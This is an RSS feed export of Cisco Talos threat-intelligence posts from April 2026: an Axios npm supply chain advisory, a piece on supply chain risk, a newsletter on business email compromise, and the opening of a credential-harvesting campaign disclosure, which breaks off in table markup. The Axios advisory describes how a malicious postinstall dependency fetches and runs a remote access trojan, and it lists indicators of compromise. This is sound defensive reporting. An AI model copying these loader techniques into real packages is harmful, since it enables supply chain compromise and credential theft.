<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Cisco Talos Blog]]></title><description><![CDATA[Talos intelligence and world-class threat research team better protects you and your organization against known and emerging cybersecurity threats.]]></description><link>https://blog.talosintelligence.com/</link><image><url>https://blog.talosintelligence.com/favicon.png</url><title>Cisco Talos Blog</title><link>https://blog.talosintelligence.com/</link></image><generator>Ghost 6.25</generator><lastBuildDate>Fri, 03 Apr 2026 17:37:23 GMT</lastBuildDate><atom:link href="https://blog.talosintelligence.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Do not get high(jacked) off your own supply (chain)]]></title><description><![CDATA[In the span of just a few weeks, we have observed a dizzying array of major supply chain attacks. If we are all building on such shaky foundation, what can we do to keep safe?]]></description><link>https://blog.talosintelligence.com/protecting-supply-chain-2026/</link><guid isPermaLink="false">69cfef79421b25000170420e</guid><category><![CDATA[On The Radar]]></category><dc:creator><![CDATA[Dave Liebenberg]]></dc:creator><pubDate>Fri, 03 Apr 2026 17:31:42 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/on_the_radar.png" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/on_the_radar.png" alt="Do not get high(jacked) off your own supply (chain)"><p>In the span of just a few weeks, we have observed a dizzying array of major supply chain attacks. Prominent examples include the malicious modification of <a href="https://blog.talosintelligence.com/axois-npm-supply-chain-incident/" rel="noreferrer">Axios</a>, a popular HTTP client library for JavaScript, as well as cascading compromises from TeamPCP, a &#x201C;chaos-as-a-service&#x201D; group that injected malicious code into hijacked GitHub repositories for open-source projects, including Trivy, an open-source security scanner.</p><p>The impact of these supply chain attacks can be vast. Axios receives 100 million downloads weekly and innumerable organizations rely on the frameworks and libraries compromised by TeamPCP. The headache they pose to organizations and their security personnel is considerable as well; affected utilities can be integrated so deeply that it may be difficult to fully catalog, let alone remediate.</p><p>Although the timing, scale, and severity of these attacks can be shocking, this is not a new phenomenon. The supply chain has remained an attractive target for some time because of its fragility and the fact that a successful compromise can lead to countless additional downstream victims.</p><p>Findings from the recently published <a href="https://blog.talosintelligence.com/2025yearinreview/" rel="noreferrer">Talos 2025 Year in Review</a> illustrate these long-standing trends. Nearly 25% of the top 100 targeted vulnerabilities we observed in 2025 affect widely used frameworks and libraries. Digging deeper into the list reveals additional insights. The React2Shell vulnerability affecting React Server Components became the top-targeted vulnerability of 2025 despite being disclosed in December, reflecting the speed at which these supply chain attacks can reach massive scale. The presence of Log4j vulnerabilities shows how deeply embedded these utilities can be and therefore how difficult it can be to reduce the attack surface. Although these particular examples represent extant vulnerabilities that can be weaponized by numerous adversaries versus a deliberate attack carried out by a single adversary, they show how impactful and disruptive threats to the supply chain can be. Follow-on attacks can range from ransomware to espionage, which is reflective of the broad swath of adversaries that carry them out &#x2014; from sophisticated state-sponsored groups to teenage cyber criminals.</p><p>If we are all building on such shaky foundation, what can we do to keep safe? After all, it certainly seems dire when a tool such as Trivy that we could normally use to scan for supply chain vulnerabilities becomes compromised itself. But there are concrete steps we can take to improve our security posture.</p><p>As highlighted in the Year in Review, protecting identity is key. This includes securing CI/CD pipelines to prevent these types of compromises from occurring in the first place, as well as limiting the impact and lateral movement of an adversary should they obtain access to a downstream victim.</p><p>In addition, organizations must try to the best of their abilities to inventory the software libraries and frameworks they employ, stay informed of security incidents, and respond rapidly to implement patching and other mitigations.</p><p>Just as supply chain attacks are evergreen, so too is the efficacy of security fundamentals, such as segmentation, robust logging, multi-factor authentication (MFA), and the implementation of emergency response plans.</p><p>As trust continues to break down, the only viable solution may be to double down on vigilance. Since this recent spate of attacks represents a trend that will likely only grow in intensity and breadth, the time for action and planning is now.</p><h2 id="coverage">Coverage</h2><p>Below, find a sample of the some of the recent coverage we offer to protect against these threats:</p><p>ClamAV:<br>Txt.Trojan.TeamPCP-10059839-0</p><p>Txt.Trojan.TeamPCP-10059839-0</p><p>Behavioral Protections:<br>LiteLLM Supply Chain Compromise &#x2013; alerts during installation of compromised packages</p>]]></content:encoded></item><item><title><![CDATA[Axios NPM supply chain incident]]></title><description><![CDATA[Overview of the recent Axios NPM supply chain incident including details of the payloads delivered from actor-controlled infrastructure.]]></description><link>https://blog.talosintelligence.com/axois-npm-supply-chain-incident/</link><guid isPermaLink="false">69cfc745421b2500017041ec</guid><category><![CDATA[Threat Advisory]]></category><category><![CDATA[Cisco Talos Web Filtering]]></category><dc:creator><![CDATA[Nick Biasini]]></dc:creator><pubDate>Fri, 03 Apr 2026 17:00:22 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_advisory.png" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_advisory.png" alt="Axios NPM supply chain incident"><p>Cisco Talos is actively investigating the March 31, 2026 supply chain attack on the official Axios node package manager (npm) package during which two malicious versions (v1.14.1 and v0.30.4) were deployed. Axios is one of the more popular JavaScript libraries with as many as 100 million downloads per week.</p><p>Axios is a widely-deployed HTTP client library for JavaScript that simplifies HTTP requests, specifically for REST endpoints. The malicious packages were only available for approximately three hours, but if downloaded Talos strongly encourages that all deployments should be rolled back to previous known safe versions (v1.14.0 or v0.30.3). Additionally, Talos strongly recommends users and administrators investigate any systems that downloaded the malicious package for follow-on payloads from actor-controlled infrastructure.</p><h2 id="details-of-supply-chain-attack">Details of supply chain attack</h2><p>The primary modification of the packages introduced a fake runtime dependency (plain-crypto-js) that executes via post-install without any user interaction required. Upon execution, the dependency reaches out to actor-controlled infrastructure (142[.]11[.]206[.]73) with operating system information to deliver a platform-specific payload to Linux, MacOS, or Windows.</p><p>On MacOS, a binary, &#x201C;com.apple.act.mond&#x201D;, is downloaded and run using zsh. Windows is delivered a ps1 file, which copies the legitimate powershell executable to &#x201C;%PROGRAM DATA%\wt.exe&#x201D;, and executes the downloaded ps1 file with hidden and execution policy bypass flags. On Linux, a Python backdoor is downloaded and executed. The payload is a remote access trojan (RAT) with typical associated capabilities allowing the actor to gather information and run additional payloads.</p><h2 id="impact">Impact</h2><p>As with most supply chain attacks, the full impact will likely take some time to uncover. The threat actors exfiltrated credentials along with remote management capabilities. Therefore, Talos strongly recommends organizations treat any credentials present on their systems with the malicious package as compromised and begin the process of rotating them as quickly as possible. Actors are likely to try to weaponize access as quickly as possible to maximize financial gain.</p><p>Supply chain attacks tend to have unexpected downstream impacts, as these packages are widely used across a variety of applications, and the compromised credentials can be leveraged in follow-on attacks. For additional context, about 25% of the top 100 vulnerabilities in the Cisco Talos 2025 <a href="https://blog.talosintelligence.com/category/year-in-review/" rel="noreferrer">Year in Review</a> affect widely used frameworks and libraries, highlighting the risk of supply chain-style attacks.</p><p>Talos will continue to monitor any follow-on impacts from this supply chain attack in the days and weeks ahead, as well as any additional indicators that are uncovered as a result of our ongoing investigation.</p><h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IoCs)</h2><p>IP Address:<br>142[.]11[.]206[.]73</p><p>Domains:<br>Sfrclak[.]com</p><p>SHA256<br>e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (setup[.]js)<br>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (Linux)<br>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (Windows)<br>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a (MacOS)<br>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (6202033.ps1)</p>]]></content:encoded></item><item><title><![CDATA[The democratisation of business email compromise fraud]]></title><description><![CDATA[This week, Martin tells the story of a crime he encountered and how it shows that the threat landscape is changing.]]></description><link>https://blog.talosintelligence.com/the-democratisation-of-business-email-compromise-fraud/</link><guid isPermaLink="false">69cd78756e9b6600017f2b98</guid><category><![CDATA[Threat Source newsletter]]></category><dc:creator><![CDATA[Martin Lee]]></dc:creator><pubDate>Thu, 02 Apr 2026 18:00:20 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/threat_source.jpg" alt="The democratisation of business email compromise fraud"><p>Welcome to this week&#x2019;s edition of the Threat Source newsletter.</p><p>Last weekend, I witnessed a crime. Not a notable crime that you might read about in the press, but an unremarkable fraud attempt that nevertheless illustrates how new threat actor capabilities are emerging.</p><p>I imagine that most people reading this probably field IT questions from friends, family, and your local community. I assist with the IT provision for a local community association. It&#x2019;s not a wealthy, large association &#x2014; just your typical volunteer-run nonprofit like many others in the region providing community services.</p><p>This weekend, the chair emailed the treasurer requesting a bank transfer. The treasurer replied asking for the recipient&apos;s details, and the chair promptly responded. The emails appeared authentic: correct names, a sum consistent with the association&apos;s regular expenditure. Yet something made the treasurer pause. The reason for the transfer felt vague, and the tone seemed slightly off. They picked up the phone to verify. The chair had no idea what they were talking about. The emails and the request were an attempted fraud by a third party.</p><p>This is a variant of the business email compromise (BEC) scam in which an attacker impersonates a trusted individual and requests a fund transfer to an account they control. The attacker relies on social engineering to trick someone with payment authority to send the money. Once received, funds typically pass through money mules or compromised personal accounts before being rapidly shuffled through multiple transfers, obscuring the trail and drastically reducing the chances of recovery.</p><p>The initial email is often sent from a plausible email address. Closely scrutinising the sender&#x2019;s email address may not help, since the attack may originate from the sender&#x2019;s genuine account that has previously been compromised.</p><p>Historically, BEC targeted large organisations where anticipated payouts justified the time investment required to research key personnel and craft targeted attacks. The anticipated payout would more than cover the costs involved.</p><p>However, the fact that attackers are willing to target a small community organisation for a relatively small sum of money shows that the economics of the attack have changed.</p><p>AI has fundamentally altered the economics of BEC. Attackers can now reconnoitre many small organisations rapidly and cheaply. AI-generated content can be tailored to each target: referencing specific projects, using appropriate terminology, matching organisational tone.</p><p>The attack no longer needs to be labour-intensive or highly targeted. It&apos;s become democratised, and an accessible playbook for targeting any organisation. Community associations, local charities, or small businesses can now be targeted, both because the attack is easier to execute, but also because scamming smaller sums from many victims can be as profitable as scamming large sums from few victims. Unfortunately, because this profile of organisation may never have encountered this threat before, they may be unaware and consequently more vulnerable.</p><p>For every treasurer who pauses when something doesn&#x2019;t quite feel right, there are others who will accept an apparently legitimate email at face value. Protection begins with awareness of how the fraud operates. Be suspicious of any unexpected request for payment, especially if there is a sense of urgency or reasons why a phone call &quot;isn&apos;t possible&quot; right now. Verify through separate channels before any transfer occurs. Call a known number for your contact, not one provided in the suspicious email. Enforce strict procurement rules that prevent any last-minute urgent payments.</p><p>Above all, recognise the democratisation of business email compromise scams. They&#x2019;re no longer something that only happens to large corporations with complex supply chains and international operations. They&#x2019;re for everyone now.</p><h2 id="the-one-big-thing">The one&#xA0;big thing&#xA0;</h2><p>Cisco Talos has&#xA0;identified&#xA0;a&#xA0;<a href="https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications" rel="noreferrer noopener"><u>large-scale automated credential harvesting campaign</u></a>&#xA0;that exploits React2Shell, a remote code execution vulnerability in Next.js applications (CVE-2025-55182). Using a custom framework called &quot;NEXUS Listener,&quot; the attackers automatically extract and aggregate sensitive data &#x2014; including cloud tokens, database credentials, and SSH keys &#x2014; from hundreds of compromised hosts to&#xA0;facilitate&#xA0;further malicious activity.&#xA0;</p><h3 id="why-do-i-care">Why do I care?&#xA0;</h3><p>This campaign uses high-speed automation to exploit React2Shell, enabling attackers to rapidly harvest high-value credentials and&#xA0;establish&#xA0;persistent, unauthenticated access. This creates significant risks for lateral movement and supply chain integrity. Furthermore, the centralized aggregation of stolen data allows attackers to map infrastructure for targeted follow-on attacks and potential data breaches.&#xA0;</p><h3 id="so-now-what">So now what?&#xA0;</h3><p>Organizations should&#xA0;immediately&#xA0;audit Next.js applications for the React2Shell vulnerability and rotate all potentially compromised credentials, including API keys and SSH keys. Enforce IMDSv2 on AWS instances and implement RASP or tuned WAF rules to detect malicious payloads. Finally, apply strict least-privilege access controls within container environments to limit the potential impact of a compromise.&#xA0;</p><p><a href="https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications" rel="noreferrer noopener"><u>Read the full blog</u></a>&#xA0;for coverage and indicators of compromise (IOCs).</p><h2 id="top-security-headlines-of-the-week">Top security headlines of the week&#xA0;</h2><p><strong>F5 BIG-IP DoS flaw upgraded to critical RCE, now exploited in the wild</strong>&#xA0;<br>The US cybersecurity agency CISA on Friday warned that threat actors have been exploiting a critical-severity F5 BIG-IP vulnerability in the wild. (<a href="https://www.securityweek.com/f5-big-ip-dos-flaw-upgraded-to-critical-rce-now-exploited-in-the-wild/" rel="noreferrer noopener"><u>SecurityWeek</u></a>)&#xA0;</p><p><strong>European</strong>&#xA0;<strong>Commission investigating breach after Amazon cloud account hack</strong>&#xA0;<br>The threat actor told&#xA0;BleepingComputer&#xA0;that they will not&#xA0;attempt&#xA0;to extort the Commission using the allegedly stolen&#xA0;data, but&#xA0;intend to leak it online&#xA0;at a later date. (<a href="https://www.bleepingcomputer.com/news/security/european-commission-investigating-breach-after-amazon-cloud-account-hack/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>Google fixes fourth Chrome zero-day exploited in attacks in 2026</strong>&#xA0;<br>As detailed in the Chromium commit history, this vulnerability stems from a use-after-free weakness in Dawn, the underlying cross-platform implementation of the&#xA0;WebGPU&#xA0;standard used by the Chromium project. (<a href="https://www.bleepingcomputer.com/news/security/google-fixes-fourth-chrome-zero-day-exploited-in-attacks-in-2026/" rel="noreferrer noopener"><u>BleepingComputer</u></a>)&#xA0;</p><p><strong>Anthropic inadvertently leaks source code for Claude Code CLI tool</strong>&#xA0;<br>Anthropic quickly removed the source code, but users have already posted mirrors on GitHub.&#xA0;They are actively dissecting the code to understand the tool&apos;s inner workings.&#xA0;(<a href="https://cybernews.com/security/anthropic-claude-code-source-leak/?utm_source=tldrinfosec" rel="noreferrer noopener"><u>Cybernews</u></a>)&#xA0;</p><h2 id="can%E2%80%99t-get-enough-talos">Can&#x2019;t&#xA0;get enough Talos?&#xA0;</h2><p><a href="https://blog.talosintelligence.com/qilin-edr-killer" rel="noreferrer noopener"><strong><u>Qilin EDR killer infection chain</u></strong></a>&#xA0;<br>Take&#xA0;a deep dive into the malicious &#x201C;msimg32.dll&#x201D; used in&#xA0;Qilin&#xA0;ransomware attacks, which is a multi-stage infection chain targeting EDR systems. It can&#xA0;terminate&#xA0;over 300 different EDR drivers from&#xA0;almost every&#xA0;vendor in the market.&#xA0;</p><p><a href="https://blog.talosintelligence.com/an-overview-of-ransomware-threats-in-japan-in-2025-and-early-detection-insights-from-qilin-cases" rel="noreferrer noopener"><strong><u>An overview of 2025 ransomware threats in Japan</u></strong></a>&#xA0;<br>In 2025, the number of ransomware incidents increased compared to 2024. Notably, it was a year in which attacks leveraging&#xA0;Qilin&#xA0;ransomware were&#xA0;observed&#xA0;most&#xA0;frequently.&#xA0;</p><p><a href="https://blog.talosintelligence.com/inside-the-talos-2025-year-in-review-a-discussion-on-what-the-data-means-for-defenders/" rel="noreferrer noopener"><strong><u>A discussion on what the data means for defenders</u></strong></a>&#xA0;<br>To unpack the biggest Year in Review takeaways and what they mean for security teams, we brought together Christopher Marshall, VP of Cisco Talos, and Peter Bailey, SVP and GM of Cisco Security.&#xA0;</p><p><a href="https://youtu.be/OQxa21N9AB4" rel="noreferrer noopener"><strong><u>When attackers become trusted users</u></strong></a>&#xA0;<br>The latest TTP draws on 2025 Year in Review data to explore how identity is being used to gain, extend, and&#xA0;maintain&#xA0;access inside environments.</p><h2 id="upcoming-events-where-you-can-find-talos">Upcoming events where you can find Talos&#xA0;</h2><ul><li><a href="https://www.offensivecon.org/" rel="noreferrer noopener"><u>OffensiveCon</u></a>&#xA0;(May 15 &#x2013; 16)&#xA0;Berlin, Germany&#xA0;</li></ul><h2 id="most-prevalent-malware-files-from-talos-telemetry-over-the-past-week">Most prevalent malware files from Talos telemetry over the past week&#xA0;</h2><p><strong>SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</strong>&#xA0;<br>MD5: aac3165ece2959f39ff98334618d10d9&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974</u></a>&#xA0;<br>Example&#xA0;Filename: d4aa3e7010220ad1b458fac17039c274_63_Exe.exe&#xA0;<br>Detection Name:&#xA0;W32.Injector:Gen.21ie.1201&#xA0;</p><p><strong>SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</strong>&#xA0;<br>MD5: 2915b3f8b703eb744fc54c81f4a9c67f&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507</u></a>&#xA0;<br>Example&#xA0;Filename: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507.exe&#xA0;<br>Detection Name:&#xA0;Win.Worm.Coinminer::1201&#xA0;</p><p><strong>SHA256: 90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</strong>&#xA0;<br>MD5: c2efb2dcacba6d3ccc175b6ce1b7ed0a&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=90b1456cdbe6bc2779ea0b4736ed9a998a71ae37390331b6ba87e389a49d3d59</u></a>&#xA0;<br>Example&#xA0;Filename:&#xA0;APQ9305.dll&#xA0;<br>Detection Name: Auto.90B145.282358.in02&#xA0;</p><p><strong>SHA256: 38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</strong>&#xA0;<br>MD5: 41444d7018601b599beac0c60ed1bf83&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=38d053135ddceaef0abb8296f3b0bf6114b25e10e6fa1bb8050aeecec4ba8f55</u></a>&#xA0;<br>Example&#xA0;Filename:&#xA0;content.js&#xA0;<br>Detection Name: W32.38D053135D-95.SBX.TG&#xA0;</p><p><strong>SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</strong>&#xA0;<br>MD5: a2cf85d22a54e26794cbc7be16840bb1&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe</u></a>&#xA0;<br>Example&#xA0;Filename:&#xA0;a2cf85d22a54e26794cbc7be16840bb1.exe&#xA0;<br>Detection Name: W32.5E6060DF7E-100.SBX.TG&#xA0;</p><p><strong>SHA256: e303ac1a9b378382830fc6a0b5a9574eca415d14d9282e2b4aced725db9cfbc5</strong>&#xA0;<br>MD5: 48a4f5fb6dc4633a41e6fe0aa65b4fa6&#xA0;<br>Talos Rep:&#xA0;<a href="https://talosintelligence.com/talos_file_reputation?s=e303ac1a9b378382830fc6a0b5a9574eca415d14d9282e2b4aced725db9cfbc5" rel="noreferrer noopener"><u>https://talosintelligence.com/talos_file_reputation?s=e303ac1a9b378382830fc6a0b5a9574eca415d14d9282e2b4aced725db9cfbc5</u></a>&#xA0;<br>Example&#xA0;Filename:&#xA0;48a4f5fb6dc4633a41e6fe0aa65b4fa6.exe&#xA0;<br>Detection Name: W32.E303AC1A9B-95.SBX.TG&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[[Video] The TTP Ep 21: When Attackers Become Trusted Users]]></title><description><![CDATA[An episode of the Talos Threat Perspective on the 2025 Year in Review trends. We explore how identity is being used to gain, extend, and maintain access inside environments. ]]></description><link>https://blog.talosintelligence.com/video-the-ttp-ep-21-when-attackers-become-trusted-users/</link><guid isPermaLink="false">69ce68b81fc4b40001e1e215</guid><category><![CDATA[2025YiR]]></category><category><![CDATA[Year In Review]]></category><dc:creator><![CDATA[Hazel Burton]]></dc:creator><pubDate>Thu, 02 Apr 2026 13:06:45 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/04/YiR2025_cover_2x1.jpg" alt="[Video] The TTP Ep 21: When Attackers Become Trusted Users"><p>In this episode of the Talos Threat Perspective, we explore how identity is being used to gain, extend, and maintain access inside environments.&#xA0;</p><p>Drawing on insights from the <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" rel="noreferrer">2025 Talos Year in Review</a>, we break down how attackers are:&#xA0;</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;Targeting identity systems and MFA workflows&#xA0;</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;Establishing persistent, high-trust access&#xA0;</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;Using internal phishing to move laterally&#xA0;</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;Could potentially exploit over-permissioned AI agents and identity-linked access&#xA0;</p><p>&#xB7;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;Blending into normal user behaviour&#xA0;</p><p>This episode focuses on how identity enables attackers to scale their operations, and what that means for defenders trying to detect and contain them.&#xA0;</p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/OQxa21N9AB4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="The TTP Ep 21: When Attackers Become Trusted Users"></iframe></figure><div class="kg-card kg-header-card kg-v2 kg-width-regular " data-background-color="#000000">
            
            <picture><img class="kg-header-card-image" src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/03/YiR2025_background-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/03/YiR2025_background-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/03/YiR2025_background-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/YiR2025_background-2.jpg 2000w" loading="lazy" alt="[Video] The TTP Ep 21: When Attackers Become Trusted Users"></picture>
        
            <div class="kg-header-card-content">
                
                <div class="kg-header-card-text kg-align-center">
                    <h2 id="read-the-2025-cisco-talos-year-in-review" class="kg-header-card-heading" style="color: #FFFFFF;" data-text-color="#FFFFFF"><span style="white-space: pre-wrap;">Read the 2025 Cisco Talos Year in Review</span></h2>
                    
                    <a href="https://blog.talosintelligence.com/content/files/2026/03/2025YiR-report.pdf" class="kg-header-card-button kg-style-accent" style="color: #FFFFFF;" data-button-color="accent" data-button-text-color="#FFFFFF">Download now</a>
                </div>
            </div>
        </div>]]></content:encoded></item><item><title><![CDATA[UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications]]></title><description><![CDATA[Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we currently track as UAT-10608. The campaign is primarily leveraging a collection framework dubbed “NEXUS Listener.”]]></description><link>https://blog.talosintelligence.com/uat-10608-inside-a-large-scale-automated-credential-harvesting-operation-targeting-web-applications/</link><guid isPermaLink="false">69cbee6376c83100018041f4</guid><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[Landing Page Top Story]]></category><category><![CDATA[Top Story]]></category><category><![CDATA[malware]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><dc:creator><![CDATA[Asheer Malhotra]]></dc:creator><pubDate>Thu, 02 Apr 2026 10:00:57 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_spotlight.png" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos is&#xA0;disclosing&#xA0;a large-scale automated credential harvesting campaign carried out by a threat cluster&#xA0;we&#xA0;are&#xA0;tracking as &#x201C;UAT-10608.&#x201D;&#xA0;</li><li>Post-compromise, UAT-10608 leverages automated scripts for extracting and exfiltrating credentials from a variety of applications, that are then posted to its&#xA0;command and control (C2).&#xA0;</li><li>The C2 hosts a&#xA0;web-based&#xA0;graphical&#xA0;user&#xA0;interface (GUI)&#xA0;titled &#x201C;NEXUS Listener&#x201D; that can be used&#xA0;to&#xA0;view stolen information and&#xA0;gain&#xA0;analytical&#xA0;insights&#xA0;using precompiled statistics&#xA0;on credentials harvested and hosts compromised.&#xA0;</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/03/threat_spotlight.png" alt="UAT-10608: Inside a large-scale automated credential harvesting operation targeting web applications"><p>Talos is&#xA0;disclosing&#xA0;a&#xA0;large-scale automated credential harvesting&#xA0;campaign&#xA0;carried out by a threat cluster we currently track as UAT-10608. The campaign is primarily&#xA0;leveraging&#xA0;a collection framework dubbed &#x201C;NEXUS Listener.&#x201D;&#xA0;The systematic exploitation and exfiltration campaign has resulted in the&#xA0;compromise of at least&#xA0;766 hosts,&#xA0;as of time of writing,&#xA0;across multiple geographic regions and cloud providers.&#xA0;The operation&#xA0;is targeting&#xA0;Next.js applications vulnerable to React2Shell&#xA0;(CVE-2025-55182)&#xA0;to gain initial access,&#xA0;then&#xA0;is deploying&#xA0;a&#xA0;multi-phase credential harvesting tool&#xA0;that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale.&#xA0;</p><p>The breadth of the victim&#xA0;set&#xA0;and the indiscriminate targeting pattern is consistent with automated scanning &#x2014;&#xA0;likely&#xA0;based&#xA0;on host profile data from services&#xA0;like&#xA0;Shodan,&#xA0;Censys,&#xA0;or custom scanners to&#xA0;enumerate&#xA0;publicly reachable Next.js deployments and probe them for the described React configuration vulnerabilities.&#xA0;</p><p>The core&#xA0;component&#xA0;of the framework is a web application that makes&#xA0;all of&#xA0;the exfiltrated data available to the operator in a&#xA0;graphical interface that includes&#xA0;in-depth&#xA0;statistics and search capabilities to allow them to sift through the compromised data.&#xA0;</p><p>This post details the campaign&apos;s&#xA0;methodology,&#xA0;tools,&#xA0;breadth&#xA0;and sensitivity of the exposed data, and the implications for organizations&#xA0;impacted&#xA0;by this activity.&#xA0;</p><p><em>This analysis is based on data collected for security research purposes.&#xA0;Specific credentials and victim identifiers have been withheld from this publication.</em>&#xA0;<em>Talos has informed service providers of exposed and at-risk credentials</em>&#xA0;<em>and is working with industry partners such as GitHub and AWS to quarantine credentials and inform victims.</em>&#xA0;</p>
<!--kg-card-begin: html-->
<table class="Table Ltr TableWordWrap SCXW181986150 BCX0" border="0" dir="ltr" data-tablestyle="MsoNormalTable" data-tablelook="1696" aria-rowcount="9" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; table-layout: fixed; width: 0px; border-collapse: collapse; empty-cells: show; position: relative; overflow: visible; background: transparent; border-spacing: 0px;"><tbody class="SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text;"><tr class="TableRow SCXW181986150 BCX0" role="row" aria-rowindex="1" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; height: 20px;"><td class="FirstRow FirstCol SCXW181986150 BCX0" role="rowheader" data-celllook="4369" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 0px; padding: 0px; user-select: text; overflow: visible; vertical-align: middle; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 271px;"><div class="TableCellContent SCXW181986150 BCX0" style="-webkit-user-drag: none; -webkit-tap-highlight-color: transparent; margin: 